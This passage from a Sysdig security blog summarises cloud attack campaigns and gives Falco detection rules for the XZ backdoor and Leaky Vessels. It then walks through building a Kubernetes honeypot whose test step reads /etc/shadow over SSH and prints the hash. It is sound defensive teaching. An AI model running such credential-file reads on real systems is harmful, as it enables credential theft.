Sysdig TRT discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th 2024. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

Within minutes, the attacker was able to spawn almost 6,000 instances inside the compromised account across multiple regions and execute the meson_cdn binary. This comes at a huge cost for the account owner. As a result of the attack, we estimate a cost of more than $2,000 per day for all the Meson network nodes created, even just using micro sizes. This isn’t counting the potential costs for public IP addresses which could run as much as $22,000 a month for 6,000 nodes! Estimating the reward tokens amount and value the attacker could earn is difficult since those Meson tokens haven’t had values set yet in the public market.

In the same way as in the case of Ambersquid, the image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. However, during runtime execution, we monitored outbound network traffic and we spotted gaganode being executed and performing connections to malicious IPs.

LABRAT

The LABRAT operation set itself apart from others due to the attacker’s emphasis on stealth and defense evasion in their attacks. It is common to see attackers utilize scripts as their malware because they are simpler to create. However, this attacker chose to use undetected compiled binaries, written in Go and .NET, which allowed the attacker to hide more effectively.

The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command and control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence. To generate income, the attacker deployed both cryptomining and Russian-affiliated proxyjacking scripts. Furthermore, the attacker abused a legitimate service, TryCloudFlare, to obfuscate their C2 network.

One obvious goal for this attacker was to generate income using proxyjacking and cryptomining. Proxyjacking allows the attacker to “rent” the compromised system out to a proxy network, basically selling the compromised IP Address. There is a definite cost in bandwidth, but also a potential cost in reputation if the compromised system is used in an attack or other illicit activities. Cryptomining can also incur significant financial damages if not stopped quickly. Income may not be the only goal of the LABRAT operation, as the malware also provided backdoor access to the compromised systems. This kind of access could lend itself to other attacks, such as data theft, leaks, or ransomware.

Detecting attacks that employ several layers of defense evasion, such as this one, can be challenging and requires a deep level of runtime visibility.

CVEs

The only purpose of STRT is not to hunt for new malicious actors, it is also to react quickly to new vulnerabilities that appear and to update the product with new rules for their detection in runtime. The last two examples are shown below.

CVE-2024-3094

On March 29th, 2024, a backdoor in a popular package called XZ Utils was announced on the Openwall mailing list. This utility includes a library called liblzma which is used by SSHD, a critical part of the Internet infrastructure used for remote access. When loaded, the CVE-2024-3094 affects the authentication of SSHD potentially allowing intruders access regardless of the method.

  • Affected versions: 5.6.0, 5.6.1
  • Affected Distributions: Fedora 41, Fedora Rawhide

For Sysdig Secure users, this rule is called “Backdoored library loaded into SSHD (CVE-2024-3094)” and can be found in the Sysdig Runtime Threat Detection policy.

- rule: Backdoored library loaded into SSHD (CVE-2024-3094)

  desc: A version of the liblzma library was seen loading which was backdoored by a malicious user in order to bypass SSHD authentication.

  condition: open_read and proc.name=sshd and (fd.name endswith "liblzma.so.5.6.0" or fd.name endswith "liblzma.so.5.6.1")

  output: SSHD Loaded a vulnerable library (| file=%fd.name | proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] image=%container.image.repository | proc.cmdline=%proc.cmdline | container.name=%container.name | proc.cwd=%proc.cwd proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname image=%container.image.repository | container.id=%container.id | container_name=%container.name|  proc.cwd=%proc.cwd )

  priority: WARNING

 tags: [host,container]

Leaky Vessels

On January 31st 2024, Snyk announced the discovery of four vulnerabilities in Kubernetes and Docker

  • CVE-2024-21626: CVSS – High, 8.6
  • CVE-2024-23651: CVSS – High, 8.7
  • CVE-2024-23652: CVSS – Critical, 10
  • CVE-2024-23653: CVSS – Critical, 9.8

For Kubernetes, the vulnerabilities are specific to the runc CRI. Successful exploitation allows an attacker to escape the container and gain access to the host operating system. To exploit these vulnerabilities, an attacker will need to control the Dockerfile when the containers are built.

The following Falco rule will detect the affected container runtimes trying to change the directory to a proc file descriptor, which isn’t normal activity.  This rule should be considered experimental and can be used in OSS Falco and Sysdig Secure as a custom rule.

- rule: Suspicious Chdir Event Detected

  desc: Detects a process changing a directory using a proc-based file descriptor.  

  condition: >

    evt.type=chdir and evt.dir=< and evt.rawres=0 and evt.arg.path startswith "/proc/self/fd/" 

  output: >

    Suspicious Chdir event detected, executed by process %proc.name with cmdline %proc.cmdline under user %user.name (details=%evt.args proc.cmdline=%proc.cmdline evt.type=%evt.type evt.res=%evt.res fd=%evt.arg.fd nstype=%evt.arg.nstype proc.pid=%proc.pid proc.cwd=%proc.cwd proc.pname=%proc.pname proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name container.id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)

  priority: WARNING

  tags: [host, container]

MEET SYSDIG TRT AT RSAC 2024

Sysdig Threat Research Team (TRT) members will be onsite at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco, to share insights from their findings and analysis of some of the hottest and most important cybersecurity topics this year.

Reserve a time to connect with the Sysdig TRT team at the show!

The post Meet the Research behind our Threat Research Team appeared first on Sysdig.

]]>
Building Honeypots with vcluster and Falco: Episode II https://sysdig.com/blog/honeypots-vcluster-and-falco-episode-ii/ Wed, 10 Apr 2024 21:00:00 +0000 https://sysdig.com/?p=86701 This is part two in our series on building honeypots with Falco, vcluster, and other assorted open source tools. For...

The post Building Honeypots with vcluster and Falco: Episode II appeared first on Sysdig.

]]>
This is part two in our series on building honeypots with Falco, vcluster, and other assorted open source tools. For the previous installment, see Building honeypots with vcluster and Falco: Episode I.

When Last We Left our Heroes

In the previous article, we discussed high-interaction honeypots and used vcluster to build an intentionally-vulnerable SSH server inside of its own cluster so it couldn’t hurt anything else in the environment when it got owned. Then, we installed Falco on the host and proceeded to attack the SSH server, watching the Falco logs to see the appropriate rule trigger when we read /etc/shadow. 

This is all great, but it’s just a start. This time around, we’ll be adding additional functionality to our honeypot so we can react to what is happening inside it. Some of these additional pieces will also be laying down the infrastructure for adding additional functionality down the road. 

We’ll be going beyond the basics, and this is where things start to get fun.

Our Shortcomings

The setup from the previous article had two major shortcomings. There are a few more, but we’ll get to those later.

First, the previous iteration of our honeypot required being run directly on an OS sitting on an actual hunk of hardware. This is of limited utility as it really doesn’t scale well unless we want to set up an army of hardware to support our eventual sprawl of honeypot bits. At the time, this was the only way we could do this with Minikube and Falco, as the Falco of yore didn’t have the kernel modules we needed to do otherwise. Fortunately, this is no longer the case. We can now take a more cloud-native approach and build this on an EC2 instance in AWS, and everything will be satisfactory. To the cloud!

NOTE: We’re going to be building a honeypot which is, by definition, an intentionally vulnerable system. We won’t have much in the way of monitoring built out just yet, so we don’t suggest that you expose it to the internet.

Second, the old honeypot didn’t do much other than complain into the Falco logs when we went poking around in the pod’s sensitive files. This, we can also fix. We’re going to be using Falcosidekick and Falco Talon to make our honeypot actually do something when we go tripping Falco rules.

Response Engines

Response engine is a term often used in the context of EDR (Endpoint Detection and Response), SIEM (Security Information and Event Management), SOAR (Security Orchestration, Automation and Response), and XDR (Extended Detection and Response). See EDR vs. XDR vs. SIEM vs. MDR vs. SOAR for more information. 

It’s a component that executes an automated response to security threats. This is exactly the tool we need in this case. 

When we trip one of the Falco rules by interacting with our honeypot, we need to take automatic action. In our particular case, we’re going to be shutting down the pod that the attackers have owned so we can spin a clean one back up in its place. We’ll be using a tool called Falco Talon for this. We’re also going to include another tool, Falcosidekick, that will allow us some additional flexibility down the road to do other things in response to the events that happen in our environment. 

Falco Sidekick

Falco Sidekick

Falcosidekick is a great tool that enables us to connect Falco up to many other interesting bits and pieces. We can use it to perform monitoring and alerting, ship logs off to different tools, and all sorts of other things. This is the glue piece that we will use to send the events to Falco Talon. 

Falco Talon

Falco Talon is the piece that will be performing the actual responses to the Falco rules that get tripped. Talon has its own internal set of rules that defines which Falco rules it should respond to and what it should do when they are triggered. 

Getting Our Hands Dirty

Let’s jump right in and build some things. 

This time around, we’ll be building our honeypot on an Ubuntu Server 22.04 t3.xlarge EC2 instance on AWS. You may be able to go with a smaller instance, but there is a point at which the instance won’t have sufficient resources for everything to spin up. Very small instances, such as the t2.micro, will almost certainly not have sufficient horsepower for everything to function properly. 

In theory, you should be able to build this on any of the similar cloud services and have it work, as long as you have all the proper application bits in place. 

As a prerequisite, you will need to have installed the following tools, at the noted version or higher:

The rest we’ll install as we work through the process. 

Fire Up Minikube

1 – First we want to start up minikube using the docker driver. We’ll see it go through its paces and download a few dependencies.

21 – Next, we’ll enable the ingress addon for minikube. This will allow us to reach the SSH server that we’ll be installing shortly.

$ minikube start --vm-driver=docker

😄  minikube v1.32.0 on Ubuntu 22.04
✨  Using the docker driver based on user configuration
📌  Using Docker driver with root privileges
👍  Starting control plane node minikube in cluster minikube
🚜  Pulling base image ...
💾  Downloading Kubernetes v1.28.3 preload ...
    > preloaded-images-k8s-v18-v1...:  403.35 MiB / 403.35 MiB  100.00% 51.69 M
🔥  Creating docker container (CPUs=2, Memory=3900MB) ...
🐳  Preparing Kubernetes v1.28.3 on Docker 24.0.7 ...
    ▪ Generating certificates and keys ...
    ▪ Booting up control plane ...
    ▪ Configuring RBAC rules ...
🔗  Configuring bridge CNI (Container Networking Interface) ...
    ▪ Using image gcr.io/k8s-minikube/storage-provisioner:v5
🔎  Verifying Kubernetes components...
🌟  Enabled addons: storage-provisioner, default-storageclass
🏄  Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default

$ minikube addons enable ingress

💡  ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub.
You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS
    ▪ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0
    ▪ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0
    ▪ Using image registry.k8s.io/ingress-nginx/controller:v1.9.4
🔎  Verifying ingress addon...
🌟  The 'ingress' addon is enabled


Install Falco

1 – Next, we need to add the falcosecurity helm repo so we can access the helm chart for Falco.

4 – Once we have the repo added, we’ll update to get the latest chart.

11 – We’ll use kubectl to create a namespace for Falco to live in. We’ll also use this same namespace later for Sidekick and Talon.

14 – Now, we’ll kick off the Falco install. You’ll notice here we have a few additional arguments to disable buffering for the Falco logs so we get events more quickly, install Sidekick during the Falco install, enable the web UI, and set up the outgoing webhook for Sidekick to point at the URL where Talon will shortly be listening.

$ helm repo add falcosecurity https://falcosecurity.github.io/charts
"falcosecurity" has been added to your repositories

$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
...Successfully got an update from the "stable" chart repository
Update Complete. ⎈Happy Helming!⎈

$ kubectl create namespace falco
namespace/falco created

$ helm install falco falcosecurity/falco --namespace falco \
--set tty=true \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set falcosidekick.config.webhook.address="http://falco-talon:2803"
NAME: falco
LAST DEPLOYED: Wed Dec  0 19:38:38 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 1
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.


💡Note: If you want to dig deeper into Falco, take a look at the course Falco 101.

Update the Falco Rules

Later on, we’ll be setting up a port forward for the SSH server so we can reach it. Falco is going to be vocal about this and it will trigger the “Redirect STDOUT/STDIN to Network Connection in Container” rule a LOT, which will make it difficult to see the rule we actually care about in the Falco logs, as well as send quite a lot of extra events to Talon. Let’s just disable that rule.

If you want to take a look at the rule we’re disabling, you can find it in the Falco rules repo here.

1 – We’re going to make a temporary file to hold our rule modification, into which we will insert a customRules section.

2 – Next, we’ll add the override.yaml.

3 – Then, the existing rule from the Falco rules file that we’re going to override.

4 – And, tell Falco that we want to disable it.

6 – Then, we’ll use helm to upgrade Falco and feed it the file we made, telling it to reuse the rest of the values it previously had.

21 – Lastly, we’ll kill off the existing Falco pods so we get new ones with the rule disabled in their rulesets.

echo "customRules:" > /tmp/customrules.yaml
echo "  override.yaml: |-" >> /tmp/customrules.yaml
echo "    - rule: Redirect STDOUT/STDIN to Network Connection in Container" >> /tmp/customrules.yaml
echo "      enabled: false" >> /tmp/customrules.yaml

$ helm upgrade falco falcosecurity/falco --namespace falco --values /tmp/customrules.yaml --reuse-values
Release "falco" has been upgraded. Happy Helming!
NAME: falco
LAST DEPLOYED: Wed Dec  0 23:56:23 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 2
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.

$ kubectl delete pods -n falco -l app.kubernetes.io/name=falco
pod "falco-94wsk" deleted


Install Falco Talon

Now let’s install Falco Talon.

1 – As it’s currently an alpha, Talon isn’t published in the standard helm repos. We’ll clone the Talon repo from GitHub to get a copy of the helm chart. 

12 – If we take a quick look at the Talon repo, we can see the helm chart for it, as well as a couple yaml files that hold its configuration. We’ll be changing the rules.yaml in the next set of steps.

16 – Now, a quick helm install of Talon into the falco namespace alongside Falco and Sidekick.

git clone https://github.com/Issif/falco-talon.git /tmp/falco-talon

Cloning into '/tmp/falco-talon'...
remote: Enumerating objects: 1599, done.
remote: Counting objects: 100% (744/744), done.
remote: Compressing objects: 100% (349/349), done.
remote: Total 1599 (delta 473), reused 565 (delta 338), pack-reused 855
Receiving objects: 100% (1599/1599), 743.58 KiB | 2.81 MiB/s, done.
Resolving deltas: 100% (866/866), done.

 
ls /tmp/falco-talon/deployment/helm/
Chart.yaml  rules.yaml  templates  values.yaml


$ helm install falco-talon /tmp/falco-talon/deployment/helm --namespace falco

NAME: falco-talon
LAST DEPLOYED: Thu Dec  0 00:01:53 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 1
TEST SUITE: None

Update the Talon Rules and Configuration

As we discussed earlier, we need to set up the rules for Talon separately. Let’s take a quick peek at what we have in the rules.yaml now.

1 – Each rule in the file is designated with ‘- name’ and we have a few examples to look at.

21 – This is a rule along the lines of what we want to replicate, though we can drop the parameters section.

$ cat /tmp/falco-talon/deployment/helm/rules.yaml 

- name: Rule Labelize                                                                                                                                                                     
  match:                                                                                                                                                                                  
    rules:                                                                                                                                                                                
      - Terminal shell in container                                                                                                                                                       
    output_fields:                                                                                                                                                                        
      - k8s.ns.name!=kube-system                                                                                                                                                          
  action:                                                                                                                                                                                 
    name: kubernetes:labelize                                                                                                                                                             
    parameters:                                                                                                                                                                           
      labels:                                                                                                                                                                             
        suspicious: "true"                                                                                                                                                                
- name: Rule NetworkPolicy                                                                                                                                                                
  match:                                                                                                                                                                                  
    rules:                                                                                                                                                                                
      - "Outbound Connection to C2 Servers"                                                                                                                                               
  action:                                                                                                                                                                                 
    name: kubernetes:networkpolicy                                                                                                                                                        
  before: true                                                                                                                                                                            
- name: Rule Terminate                                                                                                                                                                    
  match:                                                                                                                                                                                  
    rules:                                                                                                                                                                                
      - "Outbound Connection to C2 Servers"                                                                                                                                               
  action:                                                                                                                                                                                 
    name: kubernetes:terminate                                                                                                                                                            
    parameters:                                                                                                                                                                           
      ignoreDaemonsets: true                                                                                                                                                              
      ignoreStatefulsets: true


This will work very similarly to how we edited the Falco rules earlier.

1 – We’ll echo a series of lines into the /tmp/falco-talon/deployment/helm/rules.yaml file. We need to name the Talon rule (this is an arbitrary name), tell it which Falco rule we want to match against (this is the specific name of the Falco rule), and then tell it what action we want it to take on a match. In this case, we’ll be terminating the pod.

15 – We need to comment out one of the outputs in the values.yaml in the Talon chart directory while we’re in here, since we won’t be configuring a Slack alert. If we didn’t do this, it wouldn’t hurt anything, but we would see an error later in the Talon logs.

17 – Once again, we’ll do a helm upgrade and point at our updated files. Note that we aren’t  using the –reuse-values argument to tell helm to keep the rest of the existing settings this time. If we did this, our changes to the values.yaml would not be included.

27 – Then, we need to kill the existing pods to refresh them.

$ echo -e '                                                                                                                                                           ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '- name: Sensitive file opened                                                                                                                                                             ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '  match:                                                                                                                                                                                  ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '    rules:                                                                                                                                                                                ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '      - "Read sensitive file untrusted"                                                                                                                                                   ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '  action:                                                                                                                                                                                 ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '    name: kubernetes:terminate ' >> /tmp/falco-talon/deployment/helm/rules.yaml

sed -i 's/^\s*-\s*slack/ # - slack/' /tmp/falco-talon/deployment/helm/values.yaml

$ helm upgrade falco-talon /tmp/falco-talon/deployment/helm --namespace falco

Release "falco-talon" has been upgraded. Happy Helming!
NAME: falco-talon
LAST DEPLOYED: Thu Dec  0 00:10:28 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 2
TEST SUITE: None

$ kubectl delete pods -n falco -l app.kubernetes.io/name=falco-talon

pod "falco-talon-5bcf97655d-gvkv9" deleted
pod "falco-talon-5bcf97655d-wxr4g" deleted


Install vcluster

So that we can run our SSH server in isolation, we’ll download vcluster and set it up.

1 – Here, we’ll set an environment variable to fish out the latest vcluster version from the GitHub repository.

3 – Now, we’ll use that environment variable to construct the download URL.

5 – We’ll use curl to download the file and move it to /usr/local/bin.

11 – Now, let’s check the vcluster version to make sure we got everything installed properly. 

14 – We’ll finish up by creating a vcluster namespace for everything to live in.

$ LATEST_TAG=$(curl -s -L -o /dev/null -w %{url_effective} "https://github.com/loft-sh/vcluster/releases/latest" | rev | cut -d'/' -f1 | rev)

$ URL="https://github.com/loft-sh/vcluster/releases/download/${LATEST_TAG}/vcluster-linux-amd64"

$ curl -L -o vcluster "$URL" && chmod +x vcluster && sudo mv vcluster /usr/local/bin;
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 61.4M  100 61.4M    0     0  80.7M      0 --:--:-- --:--:-- --:--:--  194M

$ vcluster version
vcluster version 0.18.0

$ kubectl create namespace vcluster
namespace/vcluster created


Install the SSH Server in vcluster

Now that we have vcluster working, we can get our target SSH server installed.

1 – We’ll start off by creating a virtual cluster named SSH in the vcluster namespace. It’s also important to note that we have now switched contexts to the SSH cluster. 

14 – Now, we’ll create a namespace called SSH inside our virtual cluster.

17 – We’ll add the securecodebox repo so we can get the chart for the SSH server.

20 – And, do a quick update to pull the latest chart.

27 – Here, we’ll use helm to install the intentionally vulnerable SSH server.

42 – Last, we’ll disconnect from the vcluster, which will switch our context back to minikube.

$ vcluster create ssh -n vcluster

05:36:45 info Detected local kubernetes cluster minikube. Will deploy vcluster with a NodePort & sync real nodes
05:36:45 info Create vcluster ssh...
05:36:45 info execute command: helm upgrade ssh /tmp/vcluster-0.18.0.tgz-1681152849 --kubeconfig /tmp/2282824298 --namespace vcluster --install --repository-config='' --values /tmp/654191707
05:36:46 done Successfully created virtual cluster ssh in namespace vcluster
05:36:46 info Waiting for vcluster to come up...
05:37:11 info Stopping docker proxy...
05:37:21 info Starting proxy container...
05:37:21 done Switched active kube context to vcluster_ssh_vcluster_minikube
- Use `vcluster disconnect` to return to your previous kube context
- Use `kubectl get namespaces` to access the vcluster

$ kubectl create namespace ssh
namespace/ssh created

$ helm repo add securecodebox https://charts.securecodebox.io/
"securecodebox" already exists with the same configuration, skipping

$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
...Successfully got an update from the "stable" chart repository
Update Complete. ⎈Happy Helming!⎈

$ helm install my-dummy-ssh securecodebox/dummy-ssh --version 3.4.0 --namespace ssh \
--set global.service.type="nodePort"

NAME: my-dummy-ssh
LAST DEPLOYED: Fri Dec  0 05:38:10 2023
NAMESPACE: ssh
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Demo SSH Server deployed.

Note this should used for demo and test purposes.
Do not expose this to the Internet!

$ vcluster disconnect

05:38:19 info Successfully disconnected from vcluster: ssh and switched back to the original context: minikube


Test Everything Out

Okay! Now we have everything built. Let’s give it a test.

You may recall the vcluster reference diagram from the previous article:

This will be helpful to keep in mind when visualizing the architecture as we work through this.

1 – Let’s take a quick look at the pods in the vcluster namespace. We can see our SSH server here called my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh. We’ll note that for future reference. 

10 – Here, we’ll set up a port forward to expose the SSH server.

18 – Now, we’ll kick off the rest of the events by using sshpass to SSH into the server and read the /etc/shadow file. Right now we’re doing this manually, so we don’t strictly need sshpass, but we’re going to be automating this later and we’ll need it then.

22 – Here, we can see the contents of the file.

$ kubectl get pods -n vcluster

NAME                                           READY   STATUS    RESTARTS   AGE
coredns-68bdd584b4-dwmms-x-kube-system-x-ssh   1/1     Running   0          4m43s
my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      1/1     Running   0          3m42s
ssh-0                                          1/1     Running   0          5m7s

$ sleep 30

$ kubectl port-forward svc/"$SSH_SERVICE" 5555:22 -n vcluster & 

[1] 1196783
$ Forwarding from 127.0.0.1:5555 -> 22
Forwarding from [::1]:5555 -> 22

$ sleep 10

$ sshpass -p "THEPASSWORDYOUCREATED" ssh -o StrictHostKeyChecking=no -p 5555 
root@127.0.0.1 "cat /etc/shadow"

Handling connection for 5555
root:$6$hJ/W8Ww6$pLqyBWSsxaZcksn12xZqA1Iqjz.15XryeIEZIEsa0lbiOR9/3G.qtXl/SvfFFCTPkElo7VUD7TihuOyVxEt5j/:18281:0:99999:7:::
daemon:*:18275:0:99999:7:::
bin:*:18275:0:99999:7:::
sys:*:18275:0:99999:7:::
sync:*:18275:0:99999:7:::
games:*:18275:0:99999:7:::
man:*:18275:0:99999:7:::
lp:*:18275:0:99999:7:::
mail:*:18275:0:99999:7:::
news:*:18275:0:99999:7:::
uucp:*:18275:0:99999:7:::
proxy:*:18275:0:99999:7:::
www-data:*:18275:0:99999:7:::
backup:*:18275:0:99999:7:::
list:*:18275:0:99999:7:::
irc:*:18275:0:99999:7:::
gnats:*:18275:0:99999:7:::
nobody:*:18275:0:99999:7:::
systemd-timesync:*:18275:0:99999:7:::
systemd-network:*:18275:0:99999:7:::
systemd-resolve:*:18275:0:99999:7:::
systemd-bus-proxy:*:18275:0:99999:7:::
_apt:*:18275:0:99999:7:::
sshd:*:18281:0:99999:7:::

Checking the Logs

Let’s see what all happened as a result of our attack against the SSH server.

1 – We’ll set an environment variable up to find the Falco pod for us and hold its location.

3 – Now, let’s have a look at those logs. The bits at the beginning are from Falco spinning up. Incidentally, we can see the override file that we created earlier loading here.

18 – This is the meaty bit. In the output, we can see “Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow),” which is exactly what we did when we poked at the SSH server.

22 – Now, let’s look at the Talon logs. Here, we’ll put a one-liner together that will find the Talon pods and fetch the logs for us. Note that there are two Talon pods and what we want could be in either of them, so we’ll grab the logs from both. You can see that the output is interleaved from both of them.

30 – Here, we can see the Falco event coming through to Talon. 

32 – And here we got a match against the Talon rule we created earlier. 

33 – Here is the action from the Talon rule being executed.

$ FALCO_POD=$(kubectl get pods -n falco -l app.kubernetes.io/name=falco -o=jsonpath='{.items[*].metadata.name}')

$ kubectl logs "$FALCO_POD" -n falco

Defaulted container "falco" out of: falco, falcoctl-artifact-follow, falco-driver-loader (init), falcoctl-artifact-install (init)
Fri Dec  0 05:33:49 2023: Falco version: 0.36.2 (x86_64)
Fri Dec  0 05:33:49 2023: Falco initialized with configuration file: /etc/falco/falco.yaml
Fri Dec  0 05:33:49 2023: Loading rules from file /etc/falco/falco_rules.yaml
Fri Dec  0 05:33:49 2023: Loading rules from file /etc/falco/rules.d/override.yaml
Fri Dec  0 05:33:49 2023: The chosen syscall buffer dimension is: 8388608 bytes (8 MBs)
Fri Dec  0 05:33:49 2023: Starting health webserver with threadiness 4, listening on port 8765
Fri Dec  0 05:33:49 2023: Loaded event sources: syscall
Fri Dec  0 05:33:49 2023: Enabled event sources: syscall
Fri Dec  0 05:33:49 2023: Opening 'syscall' source with Kernel module

<snip>

{"hostname":"falco-wchsq","output":"18:39:24.133546875: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=0f044393375b container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh_vcluster_e10eeedf-7ad2-4a7e-8b73-b7713d6537da_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh)","priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2023-12-08T18:39:24.133546875Z", "output_fields": {"container.id":"0f044393375b","container.image.repository":"securecodebox/dummy-ssh","container.image.tag":"v1.0.0","container.name":"k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh_vcluster_e10eeedf-7ad2-4a7e-8b73-b7713d6537da_0","evt.arg.flags":"O_RDONLY","evt.time":43012267506,"evt.type":"open","fd.name":"/etc/shadow","k8s.ns.name":"vcluster","k8s.pod.name":"my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh","proc.aname[2]":"sshd","proc.aname[3]":"containerd-shim","proc.aname[4]":null,"proc.cmdline":"cat /etc/shadow","proc.exepath":"/bin/cat","proc.name":"cat","proc.pname":"sshd","proc.tty":0,"user.loginuid":0,"user.name":"root","user.uid":0}}

<snip>

$ kubectl get pods -n falco -l app.kubernetes.io/name=falco-talon -o=jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}' | xargs -I {} kubectl logs {} -n falco

2023-12-00T05:33:41Z INF init action_category=kubernetes
2023-12-00T05:33:41Z INF init notifier=k8sevents
2023-12-00T05:33:41Z INF init notifier=slack
2023-12-00T05:33:41Z INF init result="4 rules have been successfully loaded"
2023-12-00T05:33:41Z INF init result="watch of rules enabled"
2023-12-00T05:33:41Z INF init result="Falco Talon is up and listening on 0.0.0.0:2803"
2023-12-00T05:44:46Z INF event output="05:44:46.118305822: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=1536aa9c45c2 container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh_vcluster_21bdc319-5566-41ee-8a64-d8b7628e5937_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh)" priority=Warning rule="Read sensitive file untrusted" source=syscall 
trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF match action=kubernetes:terminate rule="Sensitive file opened" trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF action Namespace=vcluster Pod=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh action=kubernetes:terminate event="05:44:46.118305822: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=1536aa9c45c2 container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh_vcluster_21bdc319-5566-41ee-8a64-d8b7628e5937_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh)" rule="Sensitive file opened" status=success trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF notification action=kubernetes:terminate notifier=k8sevents rule="Sensitive file opened" status=success trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:33:41Z INF init action_category=kubernetes
2023-12-00T05:33:41Z INF init notifier=k8sevents
2023-12-00T05:33:41Z INF init notifier=slack
2023-12-00T05:33:41Z INF init result="4 rules have been successfully loaded"
2023-12-00T05:33:41Z INF init result="watch of rules enabled"
2023-12-00T05:33:41Z INF init result="Falco Talon is up and listening on 0.0.0.0:2803

Now, let’s go take a peek at the cluster and see what happened as a result of our efforts. As we noted earlier, the name of the SSH server pod was my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh.

1 – Let’s get the pods again from the vcluster namespace. Now, we can see the name of the SSH server pod is my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh. Success!

8 – We’ll take a look at the events in the vcluster namespace and grep for my-dummy-ssh to find the bits we care about.

14 – Here, we can see the new SSH server pod my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh being started up.

20 – We can see the owned pod my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh being killed off. 

$ kubectl get pods -n vcluster

NAME                                           READY   STATUS    RESTARTS   AGE
coredns-68bdd584b4-dwmms-x-kube-system-x-ssh   1/1     Running   0          9m11s
